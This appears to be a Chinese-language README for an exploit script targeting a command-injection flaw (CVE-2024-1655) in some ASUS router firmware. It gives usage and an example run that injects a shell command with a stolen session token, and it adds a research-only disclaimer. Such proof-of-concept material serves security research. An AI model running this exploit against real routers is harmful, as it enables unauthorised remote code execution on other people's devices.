ASUS ExpertWiFi EBM63、EBM68 和 RT-AX57 Go 固件在 2024-12-04 补丁之前,splash_page_SDN.cgi 函数中存在命令注入漏洞。当攻击者发送特制请求时,可以实现任意代码执行。
参考资料:
该漏洞是经过身份验证的远程代码执行,使用此脚本的用户需要首先获取目标的登录令牌(Cookie 头中 asus_token 的值)。
$ python3 CVE-2024-1655.py --host <TARGET_HOST> --token <ASUS_TOKEN> <COMMAND>
示例:在 tmp 目录中创建文件
$ python3 CVE-2024-1655.py --host http://192.168.1.1:8080 --token pEnRts37WwOZT1qwwJjhRWFhfBLBmNQ "echo pwned > /tmp/pwn.txt"
作者创建此软件仅用于学术研究和帮助理解相关的安全风险。此外,该软件不应用于攻击未经明确授权的系统。项目维护者不对软件的滥用负责。建议负责任地使用。